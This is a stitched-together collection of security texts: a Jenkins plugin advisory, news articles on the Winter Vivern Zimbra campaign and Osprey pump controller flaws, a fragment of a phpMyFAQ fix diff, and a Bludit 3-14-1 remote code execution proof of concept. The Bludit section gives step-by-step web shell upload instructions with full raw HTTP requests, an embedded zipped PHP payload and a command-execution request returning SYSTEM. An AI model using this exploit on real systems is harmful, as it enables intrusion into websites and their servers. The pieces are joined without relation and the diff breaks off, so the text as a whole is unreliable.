Jenkins remote-jobs-view-plugin Plugin 0.0.3 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   AbsInt a³ Plugin
*   Convert To Pipeline Plugin
*   Cppcheck Plugin
*   Crap4J Plugin
*   JaCoCo Plugin
*   Mashup Portlets Plugin
*   OctoPerf Load Testing Plugin Plugin
*   OctoPerf Load Testing Plugin Plugin
*   OctoPerf Load Testing Plugin Plugin
*   Performance Publisher Plugin
*   Phabricator Differential Plugin
*   Pipeline Aggregator View Plugin
*   remote-jobs-view-plugin Plugin
*   Role-based Authorization Strategy Plugin
*   Visual Studio Code Metrics Plugin

**Descriptions****Incorrect permission checks in Role-based Authorization Strategy Plugin**

**SECURITY-3053 / CVE-2023-28668**  
**Severity (CVSS):** Medium  
**Affected plugin: role-strategy**  
**Description:**

Permissions in Jenkins can be enabled and disabled. Some permissions are disabled by default, e.g., Overall/Manage or Item/Extended Read. Disabled permissions cannot be granted directly, only through greater permissions that imply them (e.g., Overall/Administer or Item/Configure).

Role-based Authorization Strategy Plugin 587.v2872c41fa\_e51 and earlier grants permissions even after they’ve been disabled.

This allows attackers to have greater access than they’re entitled to after the following operations took place:

1.  A permission is granted to attackers directly or through groups.
    
2.  The permission is disabled, e.g., through the script console.
    

Role-based Authorization Strategy Plugin 587.588.v850a\_20a\_30162 does not grant disabled permissions.

**Stored XSS vulnerability in JaCoCo Plugin**

**SECURITY-3061 / CVE-2023-28669**  
**Severity (CVSS):** High  
**Affected plugin: jacoco**  
**Description:**

JaCoCo Plugin 3.3.2 and earlier does not escape class and method names shown on the UI.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control input files for the 'Record JaCoCo coverage report' post-build action.

JaCoCo Plugin 3.3.2.1 escapes class and method names shown on the UI.

**Stored XSS vulnerability in Pipeline Aggregator View Plugin**

**SECURITY-2885 / CVE-2023-28670**  
**Severity (CVSS):** High  
**Affected plugin: pipeline-aggregator-view**  
**Description:**

Pipeline Aggregator View Plugin 1.13 and earlier does not escape a variable representing the current view’s URL in inline JavaScript.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by authenticated attackers with Overall/Read permission.

Pipeline Aggregator View Plugin 1.14 obtains the current URL in a way not susceptible to XSS.

**CSRF vulnerability in OctoPerf Load Testing Plugin Plugin**

**SECURITY-3067 (1) / CVE-2023-28671**  
**Severity (CVSS):** Medium  
**Affected plugin: octoperf**  
**Description:**

OctoPerf Load Testing Plugin Plugin 4.5.0 and earlier does not require POST requests for a connection test HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

OctoPerf Load Testing Plugin Plugin 4.5.1 requires POST requests for the affected connection test HTTP endpoint.

**Missing permission check in OctoPerf Load Testing Plugin Plugin**

**SECURITY-3067 (2) / CVE-2023-28672**  
**Severity (CVSS):** High  
**Affected plugin: octoperf**  
**Description:**

OctoPerf Load Testing Plugin Plugin 4.5.1 and earlier does not perform a permission check in a connection test HTTP endpoint.

This allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

OctoPerf Load Testing Plugin Plugin 4.5.2 properly performs a permission check when accessing the affected connection test HTTP endpoint.

**Missing permission check in OctoPerf Load Testing Plugin Plugin allows enumerating credentials IDs**

**SECURITY-3067 (3) / CVE-2023-28673**  
**Severity (CVSS):** Medium  
**Affected plugin: octoperf**  
**Description:**

OctoPerf Load Testing Plugin Plugin 4.5.2 and earlier does not perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.

An enumeration of credentials IDs in OctoPerf Load Testing Plugin Plugin 4.5.3 requires the appropriate permissions.

**CSRF vulnerability and missing permission checks in OctoPerf Load Testing Plugin Plugin**

**SECURITY-3067 (4) / CVE-2023-28674 (CSRF), CVE-2023-28675 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: octoperf**  
**Description:**

OctoPerf Load Testing Plugin Plugin 4.5.2 and earlier does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to connect to a previously configured Octoperf server using attacker-specified credentials.

Additionally, these endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

OctoPerf Load Testing Plugin Plugin 4.5.3 requires POST requests and the appropriate permissions for the affected HTTP endpoints.

**CSRF vulnerability in Convert To Pipeline Plugin results in RCE**

**SECURITY-2963 / CVE-2023-28676**  
**Severity (CVSS):** High  
**Affected plugin: convert-to-pipeline**  
**Description:**

Convert To Pipeline Plugin 1.0 and earlier does not require POST requests for the HTTP endpoint converting a Freestyle project to Pipeline, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to create a Pipeline based on a Freestyle project. Combined with SECURITY-2966, this can result in the execution of unsandboxed Pipeline scripts.

**Command injection vulnerability in Convert To Pipeline Plugin results in RCE**

**SECURITY-2966 / CVE-2023-28677**  
**Severity (CVSS):** High  
**Affected plugin: convert-to-pipeline**  
**Description:**

Convert To Pipeline Plugin 1.0 and earlier uses basic string concatenation to convert Freestyle projects' Build Environment, Build Steps, and Post-build Actions to the equivalent Pipeline step invocations.

This allows attackers able to configure Freestyle projects to prepare a crafted configuration that injects Pipeline script code into the (unsandboxed) Pipeline resulting from a conversion by Convert To Pipeline Plugin. If an administrator converts the Freestyle project to a Pipeline, the script will be pre-approved.

**Stored XSS vulnerability in Cppcheck Plugin**

**SECURITY-2809 / CVE-2023-28678**  
**Severity (CVSS):** High  
**Affected plugin: cppcheck**  
**Description:**

Cppcheck Plugin 1.26 and earlier does not escape file names from Cppcheck report files before showing them on the Jenkins UI.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control report file contents.

**Stored XSS vulnerability in Mashup Portlets Plugin**

**SECURITY-2813 / CVE-2023-28679**  
**Severity (CVSS):** High  
**Affected plugin: mashup-portlets-plugin**  
**Description:**

Mashup Portlets Plugin 1.1.2 and earlier provides the "Generic JS Portlet" feature that lets a user populate a portlet using a custom JavaScript expression.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by authenticated attackers with Overall/Read permission.

**XXE vulnerability in Crap4J Plugin**

**SECURITY-2925 / CVE-2023-28680**  
**Severity (CVSS):** High  
**Affected plugin: crap4j**  
**Description:**

Crap4J Plugin 0.9 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers able to control Crap Report file contents to have Jenkins parse a crafted XML document that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

**XXE vulnerability in Visual Studio Code Metrics Plugin**

**SECURITY-2926 / CVE-2023-28681**  
**Severity (CVSS):** High  
**Affected plugin: vs-code-metrics**  
**Description:**

Visual Studio Code Metrics Plugin 1.7 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers able to control VS Code Metrics File contents to have Jenkins parse a crafted XML document that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

**XXE vulnerability in Performance Publisher Plugin**

**SECURITY-2928 / CVE-2023-28682**  
**Severity (CVSS):** High  
**Affected plugin: perfpublisher**  
**Description:**

Performance Publisher Plugin 8.09 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers able to control PerfPublisher report files to have Jenkins parse a crafted XML document that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

**XXE vulnerability in Phabricator Differential Plugin**

**SECURITY-2942 / CVE-2023-28683**  
**Severity (CVSS):** High  
**Affected plugin: phabricator-plugin**  
**Description:**

Phabricator Differential Plugin 2.1.5 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers able to control coverage report file contents for the 'Post to Phabricator' post-build action to have Jenkins parse a crafted XML document that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

**XXE vulnerability in remote-jobs-view-plugin Plugin**

**SECURITY-2956 / CVE-2023-28684**  
**Severity (CVSS):** High  
**Affected plugin: remote-jobs-view-plugin**  
**Description:**

remote-jobs-view-plugin Plugin 0.0.3 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows authenticated attackers with Overall/Read permission to have Jenkins parse a crafted XML document that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

**XXE vulnerability in AbsInt a³ Plugin**

**SECURITY-2930 / CVE-2023-28685**  
**Severity (CVSS):** High  
**Affected plugin: absint-a3**  
**Description:**

AbsInt a³ Plugin 1.1.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers able to control 'Project File (APX)' contents to have Jenkins parse a crafted XML document that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

**Severity**

*   SECURITY-2809: High
*   SECURITY-2813: High
*   SECURITY-2885: High
*   SECURITY-2925: High
*   SECURITY-2926: High
*   SECURITY-2928: High
*   SECURITY-2930: High
*   SECURITY-2942: High
*   SECURITY-2956: High
*   SECURITY-2963: High
*   SECURITY-2966: High
*   SECURITY-3053: Medium
*   SECURITY-3061: High
*   SECURITY-3067 (1): Medium
*   SECURITY-3067 (2): High
*   SECURITY-3067 (3): Medium
*   SECURITY-3067 (4): Medium

**Affected Versions**

*   **AbsInt a³ Plugin** up to and including 1.1.0
*   **Convert To Pipeline Plugin** up to and including 1.0
*   **Cppcheck Plugin** up to and including 1.26
*   **Crap4J Plugin** up to and including 0.9
*   **JaCoCo Plugin** up to and including 3.3.2
*   **Mashup Portlets Plugin** up to and including 1.1.2
*   **OctoPerf Load Testing Plugin Plugin** up to and including 4.5.0
*   **OctoPerf Load Testing Plugin Plugin** up to and including 4.5.1
*   **OctoPerf Load Testing Plugin Plugin** up to and including 4.5.2
*   **Performance Publisher Plugin** up to and including 8.09
*   **Phabricator Differential Plugin** up to and including 2.1.5
*   **Pipeline Aggregator View Plugin** up to and including 1.13
*   **remote-jobs-view-plugin Plugin** up to and including 0.0.3
*   **Role-based Authorization Strategy Plugin** up to and including 587.v2872c41fa\_e51
*   **Visual Studio Code Metrics Plugin** up to and including 1.7

**Fix**

*   **JaCoCo Plugin** should be updated to version 3.3.2.1
*   **OctoPerf Load Testing Plugin Plugin** should be updated to version 4.5.1
*   **OctoPerf Load Testing Plugin Plugin** should be updated to version 4.5.2
*   **OctoPerf Load Testing Plugin Plugin** should be updated to version 4.5.3
*   **Pipeline Aggregator View Plugin** should be updated to version 1.14
*   **Role-based Authorization Strategy Plugin** should be updated to version 587.588.v850a\_20a\_30162

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   AbsInt a³ Plugin
*   Convert To Pipeline Plugin
*   Cppcheck Plugin
*   Crap4J Plugin
*   Mashup Portlets Plugin
*   Performance Publisher Plugin
*   Phabricator Differential Plugin
*   remote-jobs-view-plugin Plugin
*   Visual Studio Code Metrics Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **CC Bomber, Kitri BoB** for SECURITY-2925, SECURITY-2926, SECURITY-2928, SECURITY-2930, SECURITY-2942, SECURITY-2963
*   **Daniel Beck, CloudBees, Inc. and Kevin Guerroudj, CloudBees, Inc.** for SECURITY-2809
*   **Daniel Beck, CloudBees, Inc. and Yaroslav Afenkin, CloudBees, Inc.** for SECURITY-3053
*   **Kevin Guerroudj, CloudBees, Inc.** for SECURITY-2885, SECURITY-3061
*   **LaNyer640 & Crilwa** for SECURITY-2956
*   **Valdes Che Zogou, CloudBees, Inc.** for SECURITY-2813
*   **Yaroslav Afenkin, CloudBees, Inc.** for SECURITY-2966, SECURITY-3067 (1), SECURITY-3067 (2), SECURITY-3067 (3), SECURITY-3067 (4)

CVE-2023-28684: Jenkins Security Advisory 2023-03-21

Jenkins Performance Publisher Plugin 8.09 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

CVE-2023-28682: Jenkins Security Advisory 2023-03-21

By Deeba Ahmed
Researchers have noted that attackers are targeting a medium-severity Zimbra vulnerability that the company patched in version 9.0.0 Patch 24, one year ago.
This is a post from HackRead.com Read the original post: Zimbra email platform vulnerability exploited to steal European govt emails

The cybersecurity researchers at Proofpoint have disclosed a new phishing campaign from the Russian APT group known as Winter Vivern, TA473, and UAC-0114. The group has been exploiting a vulnerability in Zimbra Collaboration software to hack the emails of government agencies in different European countries.

Although it is yet unproven which nation-state supports this APT group, security researchers believe that its activities are in alliance with the interests of Belarus and Russia.

For your information, Zimbra Collaboration is a business collaboration and email platform that allows users to send and receive emails, and manage contacts, calendars, and tasks. It can be used on-premise or in the cloud and is used by governments, educational institutions, service providers, and businesses.

**How Does the Group Target Victims?**

Winter Vivern’s modus operandi entails sending out phishing emails impersonating the target organizations or their parent organizations’ employees with political affiliation to the government.

These emails are sent from email IDs having compromised domains or hosted on vulnerable WordPress websites. The email message includes a link to a resource of the target organization’s official website.

The phishing email (Credit: Proofpoint)

However, this is a spoofed link as it redirects the recipient to a payload hosted on the attacker’s domain or a credential-stealing web page. This technique’s efficacy is now enhanced with a cross-site scripting vulnerability found in Zimbra.

**APT Group Exploiting Zimbra Vulnerability**

Zimbra is an open-source, on-premise and Cloud enabled business collaboration and email platform used by “hundreds of millions of mailboxes across 140 countries,” as per its website. The service is used by governments, educational institutions, service providers, and small to medium-sized businesses.

Proofpoint researchers noted that Winter Vivern is targeting the medium severity Zimbra vulnerability tracked as CVE-2022-27926, which Zimbra already patched in version 9.0.0 Patch 24, one year ago. The XSS flaws can allow threat actors to create links with appended code, which execute malware inside the browser when opened.

**Modus Operandi and Possible Dangers**

In the current campaign, the hackers target government agencies through vulnerable Zimbra installations/web interfaces and send phishing emails with links that exploit the XSS flaw and execute encoded JavaScript. When it is executed by the browser, a larger JavaScript payload is fetched from the attackers’ server and executed on the website in what’s called a cross-site request forgery attack. 

Attackers can now steal the victims’ usernames, passwords, and active CSRF tokens obtained from a cookie and transfer the information to their server. After obtaining login credentials and tokens, the malicious JavaScript uses hardcoded URLs to hijack the email portal.

“In some instances, researchers observed TA473 specifically targeting RoundCube webmail request tokens as well. This detailed focus on which webmail portal is being run by targeted European government entities indicates the level of reconnaissance that TA473 conducts before delivering phishing emails to organizations,” Proofpoint’s report read.

“These labour-intensive customized payloads allow actors to steal usernames, passwords, and store active session and CSRF tokens from cookies facilitating the login to publicly facing webmail portals belonging to NATO-aligned organizations,” Proofpoint noted.

**Who Are Vulnerable?**

Organizations that haven’t patched their Zimbra products in the past year are vulnerable to TA473 attacks. To prevent such attacks, it is important to restrict resources on publicly available webmail portals. This would prevent APT groups from engineering customized scripts that can steal credentials and log into the victim’s webmail accounts.

**Winter Vivern’s Past Victims**

The group’s past victims were located in India, Vietnam, Lithuania, Slovakia, and the Vatican. Sentinel Labs reported earlier in March that the group’s recent targets include Italian and Ukrainian Foreign Affairs ministries, Polish government agencies, Indian government officials, and telecommunication firms that support Ukraine in the war.

According to Proofpoint’s previous research, this group targeted elected government representatives in the US and their staffers.

1.  NATO Data Stolen in Cyberattack on Portugal
2.  Smartphones of NATO soldiers hacked by Russia
3.  Vulnerability found in NATO, EU-approved firewall
4.  NATO Probes Top Missile Firm MBDA Data Breach
5.  Russians hide Graphite malware in PowerPoint files

Zimbra email platform vulnerability exploited to steal European govt emails

By Habiba Rashid
CISA's advisory came after the Macedonian cybersecurity firm Zero Science Lab discovered and reported the vulnerabilities to authorities.
This is a post from HackRead.com Read the original post: CISA Warns of Vulnerabilities in Propump and Controls’ Osprey Pump Controller

The critical set of vulnerabilities allowed attackers to cause significant problems, such as taking control of the device and disrupting the water supply, among other nefarious activities.

Propump and Controls, a US-based company specializing in pumping systems and automated controls, has been found to have vulnerabilities in its Osprey Pump Controller, according to a report by Cybersecurity research firm Zero Science Lab.

The report stated that the vulnerabilities could allow hackers to cause significant problems, such as remotely taking control of the device and disrupting the water supply, among other nefarious activities.

CISA has published an advisory describing the vulnerabilities found by Krstic in the Osprey Pump Controller, and ten individual advisories describing each flaw were also published by Zero Science Lab’s website. The affected product is the Osprey Pump Controller version 1.01, which is used in pumping systems and automated controls. The following vulnerabilities have been discovered:

*   Insufficient entropy CWE-331: A predictable weak session token generation algorithm could aid in authentication and authorization bypass, allowing a threat actor to hijack a session by predicting the session id and gain unauthorized access to the product. CVE-2023-28395 has been assigned to this vulnerability. 

*   Use of GET request method with sensitive query strings CWE-598: An unauthenticated file disclosure could allow cybercriminals to force the affected device to disclose arbitrary files and sensitive system information. CVE-2023-28375 has been assigned to this vulnerability. 

*   Use of hard-coded password CWE-259: The web management interface configuration can be fully accessed through a hidden administrative account that has a hardcoded password. However, this account cannot be seen in the Usernames and Passwords menu of the application, and its password cannot be changed through any regular operation of the device. CVE-2023-28654 has been assigned to this vulnerability. 

*   Improper neutralization of special elements used in an OS command (‘OS command injection’) CWE-78: Vulnerability could allow unauthenticated OS command injection that may lead to an attacker injecting and executing arbitrary shell commands through HTTP POST or GET parameters. CVE-2023-27886 and CVE-2023-27394 have been assigned to these vulnerabilities.

*   Improper neutralization of input during web page generation (‘Cross-site scripting’) CWE-79: Inputs passed to a GET parameter are not properly sanitized before being returned to the user, which could enable attackers to execute arbitrary HTML/JS code in a user’s browser session in context of an affected site. CVE-2023-28648 has been assigned to this vulnerability.

*   Authentication bypass using an alternate path or channel CWE-288: This could enable an unauthorized user to bypass authentication and gain access to the system by creating an account through an alternate path or channel. CVE-2023-28398 has been assigned to this vulnerability.

*   Cross-site request forgery (CSRF) CWE-352: HTTP requests can be used by users to carry out actions without undergoing any verification checks. This may lead to a scenario where an individual without authorization may be able to carry out actions with administrative privileges in the event a logged-in user visits a harmful website. CVE-2023-28718 has been assigned to this vulnerability.

According to Security Week, the founder and chief information security engineer of Zero Science Lab, Gjoko Krstic, attempted to report his findings to the vendor, as well as the US Cybersecurity and Infrastructure Security Agency (CISA) and Carnegie Mellon University’s Vulnerability Information and Coordination Environment (VINCE), but the vendor has not responded, and the vulnerabilities likely remain unpatched.

According to Krstic, dozens of controllers are exposed on the internet, including in the case of the client whose network was assessed by Zero Science Lab. This means that attackers can access the controller and manipulate VFDs, change pressure, or cut down the water supply, depending on where the controller is applied.

In conclusion, the discovery of vulnerabilities in ProPump and Controls’ Osprey Pump Controller raises concerns about the security of industrial control systems. Companies need to ensure that their products are secure and that vulnerabilities are addressed in a timely and effective manner to prevent potential attacks that can lead to significant disruptions and damages.

However, as the vendor, in this case, has not responded, users of the Osprey Pump Controller need to take necessary precautions as instructed in the CISA advisory to protect their systems from possible attacks.

1.  Vulnerability that physically damage moving bridges
2.  Russian Building Controllers Can be Remotely Hacked
3.  Industrial Control Systems flaws let hackers unlock doors
4.  Using programmable logic controllers in industrial settings
5.  IoT Devices Hacked to Install Ransomware on OT Networks

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

CISA Warns of Vulnerabilities in Propump and Controls’ Osprey Pump Controller

The advanced persistent threat (APT) actor known as Winter Vivern is now targeting officials in Europe and the U.S. as part of an ongoing cyber espionage campaign.
"TA473 since at least February 2023 has continuously leveraged an unpatched Zimbra vulnerability in publicly facing webmail portals that allows them to gain access to the email mailboxes of government entities in Europe," Proofpoint

The advanced persistent threat (APT) actor known as **Winter Vivern** is now targeting officials in Europe and the U.S. as part of an ongoing cyber espionage campaign.

"TA473 since at least February 2023 has continuously leveraged an unpatched Zimbra vulnerability in publicly facing webmail portals that allows them to gain access to the email mailboxes of government entities in Europe," Proofpoint said in a new report.

The enterprise security firm is tracking the activity under its own moniker **TA473** (aka UAC-0114), describing it as an adversarial crew whose operations align with that of Russian and Belarussian geopolitical objectives.

What it lacks in sophistication, it makes up for in persistence. In recent months, the group has been linked to attacks targeting state authorities of Ukraine and Poland as well as government officials in India, Lithuania, Slovakia, and the Vatican.

The NATO-related intrusion wave entails the exploitation of CVE-2022-27926 (CVSS score: 6.1), a now-patched medium-severity security flaw in Zimbra Collaboration that could enable unauthenticated attackers to execute arbitrary JavaScript or HTML code.

This also involves employing scanning tools like Acunetix to identify unpatched webmail portals belonging to targeted organizations with the goal of sending phishing email under the guise of benign government agencies.

The messages come with booby-trapped URLs that exploit the cross-site scripting (XSS) flaw in Zimbra to execute custom Base64-encoded JavaScript payloads within the victims' webmail portals to exfiltrate usernames, passwords, and access tokens.

It's worth noting that each JavaScript payload is tailored to the targeted webmail portal, indicating that the threat actor is willing to invest time and resources to reduce the likelihood of detection.

"TA473's persistent approach to vulnerability scanning and exploitation of unpatched vulnerabilities impacting publicly facing webmail portals is a key factor in this actor's success," Proofpoint said.

"The group's focus on sustained reconnaissance and painstaking study of publicly exposed webmail portals to reverse engineer JavaScript capable of stealing usernames, passwords, and CSRF tokens demonstrates its investment in compromising specific targets."

The findings come amid revelations that at least three Russian intelligence agencies, including FSB, GRU (linked to Sandworm), and SVR (linked to APT29), likely use software and hacking tools developed by a Moscow-based IT contractor named NTC Vulkan.

THN WEBINAR

Become an Incident Response Pro!

Unlock the secrets to bulletproof incident response – Master the 6-Phase process with Asaf Perlman, Cynet's IR Leader!

Don't Miss Out – Save Your Seat!

This includes frameworks like Scan (to facilitate large-scale data collection), Amesit (to conduct information operations and manipulate public opinion), and Krystal-2B (to simulate coordinated IO/OT attacks against rail and pipeline control systems).

"Krystal-2B is a training platform that simulates OT attacks against different types of OT environments in coordination with some IO components by leveraging Amesit 'for the purpose of disruption,'" Google-owned Mandiant said.

"The contracted projects from NTC Vulkan provide insight into the investment of Russian intelligence services into developing capabilities to deploy more efficient operations within the beginning of the attack lifecycle, a piece of operations often hidden from our view," the threat intelligence firm said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Winter Vivern APT Targets European Government Entities with Zimbra Vulnerability

Bludit version 3-14-1 suffers from a remote shell upload vulnerability.

    # Exploit Title: Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated)# Exploit Author: Alperen Ergel# Contact: @alpernae (IG/TW)# Software Homepage: https://www.bludit.com/# Version : 3-14-1# Tested on: windows 11 wampserver | Kali linux# Category: WebApp# Google Dork: intext:'2022 Powered by Bludit'# Date: 8.12.2022######## Description ##########  Step 1 : Archive as a zip your webshell (example: payload.zip)#  Step 2 : Login admin account and download 'UploadPlugin'#  Step 3 : Go to UploadPlugin section#  Step 4 : Upload your zip#  Step 5 : target/bl-plugins/[your_payload]######### Proof of Concept ########==============> START REQUEST <========================================POST /admin/plugin/uploadplugin HTTP/2Host: localhostCookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------308003478615795926433430552264Content-Length: 1820Origin: https://036e-88-235-222-210.eu.ngrok.ioDnt: 1Referer: https://036e-88-235-222-210.eu.ngrok.io/admin/plugin/uploadpluginUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailers-----------------------------308003478615795926433430552264Content-Disposition: form-data; name="tokenCSRF"b6487f985b68f2ac2c2d79b4428dda44696d6231-----------------------------308003478615795926433430552264Content-Disposition: form-data; name="pluginorthemes"plugins-----------------------------308003478615795926433430552264Content-Disposition: form-data; name="zip_file"; filename="a.zip"Content-Type: application/zipPK    †eˆU               a/PK   ”fˆUÆ  ª)¢  Ä      a/a.phpíVÛŽÓ0}ç+La BÛìVÜ–pX®ËJ @Vêº­!µƒíÒrûwl7É$mQyà‘<$©çÌÌ93ã¸È]ƒË·ï–óÒ=/.&nbsp;pÝãZ+M5/•¶BÎÈ0>©M†[jÅ‚ÓB,„õtOÌ¤Òœ.×4;’†e)¨ƒ¼È×”¯9[Z¡dðÆ  „Œ&Âd<ó`÷+œN—’y¼ÁRLÉE¾(í7â}âø‡_‡¥æ3OºÈ'xð>A¯p‚pânÁã¤ëÀ×e¡&œük£‹¼$Øj±ØFýâ…á@\@ªgxD¢Ì'áôæQ?½v£ŸöG7ñùZgéññõ“j±u\õ„±†à/ï¾ÎÞž´×T™HÄZu™jœHkª‰È£û§gÑÅ,CÆêRâVjÅ5yùø%}q»ú­„Ä(ŽQK*Ë"Öï¡£;—Ò²·­6z²ZŸgXÊò¢ðíÄ'éûù+ñÌ%µj,ÐäàN°ùf,_à8—“‹•[³˜lO€ScsmI«‡¬«H»¯*Sc?i”)i¹´&x@.'”<—¤Ûç]zs^a®·)‚hBz0;f rì‰þÇ¸0yÕU¥H"ÕÕÿI  IØ\“t{có~€J©£ªä²Ë Ö÷š;dÁ³âÙlh†»s%Ç  Ö8Nº+«}+Ž­ÿaºržŸŸžÂÂj.îvWS²A¿O?nHO?›jžO ¤Ã£Q+ì¯æí^ Ïe8©ô*Ô¾"ý¡@Ó2+ëÂ`÷kC57j©'Î"m ã®ho¹ xŸô Û;’œcçzÙQË·[kô¿Ý¯-2ì~¨“æv©¥C€î‘Tþ#k2,UØSŽ¦€­OÁS£Øg˜‚úK †QˆÜ  ØIÏ²òÖ`Ð:%F½$A"t;buOMr4Ýè~–eãÎ™åØXíÇm˜Ç(s 6A¸3,l>º…<N®¦q{s __~tÂ6á¾,…ÅèçO´ÇÆ×Î£v²±ãÿbÃ‘Ú’‘Ug[;pq›eÓÜÅØÿéJË}êv‚3ð8´# ŠOµsÈO«ýbƒh±ï°Ÿd—Ë…¹ÿˆ>yþðMröâÁSzöæõÃûÏÜû)}óàeºqQRrf}êê_D Ø0ìu’õv'§öø?@‡ êûOæh'˜Oœ8f—D¼5[à²=b~PK?    †eˆU             $       €íA    a/          þš®,Ù þš®,Ù€ø¨j.ÙPK?   ”fˆUÆ  ª)¢  Ä    $        €¤    a/a.php          ¤eÝ-Ù ÷C-Ù bj.ÙPK      ­   ç    -----------------------------308003478615795926433430552264Content-Disposition: form-data; name="submit"Upload-----------------------------308003478615795926433430552264--==============> END REQUEST <========================================## WEB SHELL UPLOADED!==============> START RESPONSE <========================================HTTP/2 200 OKCache-Control: no-store, no-cache, must-revalidateContent-Type: text/html; charset=UTF-8Date: Thu, 08 Dec 2022 18:01:43 GMTExpires: Thu, 19 Nov 1981 08:52:00 GMTNgrok-Trace-Id: f3a92cc45b7ab0ae86e98157bb026ab4Pragma: no-cacheServer: Apache/2.4.51 (Win64) PHP/7.4.26X-Powered-By: Bludit....==============> END RESPONSE <========================================# REQUEST THE WEB SHELL==============> START REQUEST <========================================GET /bl-plugins/a/a.php?cmd=whoami HTTP/2Host: localhostCookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDnt: 1Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Te: trailers==============> END REQUEST <======================================================> START RESPONSE <========================================HTTP/2 200 OKContent-Type: text/html; charset=UTF-8Date: Thu, 08 Dec 2022 18:13:14 GMTNgrok-Trace-Id: 30639fc66dcf46ebe29cc45cf1bf3919Server: Apache/2.4.51 (Win64) PHP/7.4.26X-Powered-By: PHP/7.4.26Content-Length: 32<pre>nt authority\system</pre>==============> END RESPONSE <========================================

Bludit 3-14-1 Shell Upload

Improper Input Validation in GitHub repository thorsten/phpmyfaq prior to 3.1.12.

@@ -18,6 +18,7 @@ \*/  
use phpMyFAQ\\Filter; use phpMyFAQ\\Strings; use phpMyFAQ\\User; use phpMyFAQ\\User\\CurrentUser;  
@@ -171,7 +172,7 @@ <div class\="col-lg-12"\> <h2 class\="page-header"\> <i aria-hidden\="true" class\="fa fa-users fa-fw"\></i\> <?= $PMF\_LANG\['ad\_group\_deleteGroup'\] ?> "<?= $groupData\['name'\] ?>" <?= $PMF\_LANG\['ad\_group\_deleteGroup'\] ?> "<?= Strings::htmlentities($groupData\['name'\]) ?>" </h2\> </div\> </header\> @@ -226,8 +227,8 @@ $user = new User($faqConfig); $message = ''; $messages = \[\]; $groupName = Filter::filterInput(INPUT\_POST, 'group\_name', FILTER\_UNSAFE\_RAW, ''); $groupDescription = Filter::filterInput(INPUT\_POST, 'group\_description', FILTER\_UNSAFE\_RAW, ''); $groupName = Filter::filterInput(INPUT\_POST, 'group\_name', FILTER\_SANITIZE\_SPECIAL\_CHARS, ''); $groupDescription = Filter::filterInput(INPUT\_POST, 'group\_description', FILTER\_SANITIZE\_SPECIAL\_CHARS, ''); $groupAutoJoin = Filter::filterInput(INPUT\_POST, 'group\_auto\_join', FILTER\_UNSAFE\_RAW, ''); $csrfOkay = true; $csrfToken = Filter::filterInput(INPUT\_POST, 'csrf', FILTER\_UNSAFE\_RAW); @@ -236,7 +237,7 @@ $csrfOkay = false; } // check group name if ($groupName == '') { if ($groupName ==\= '') { $messages\[\] = $PMF\_LANG\['ad\_group\_error\_noName'\]; } // ok, let's go @@ -336,60 +337,6 @@ <?php }  
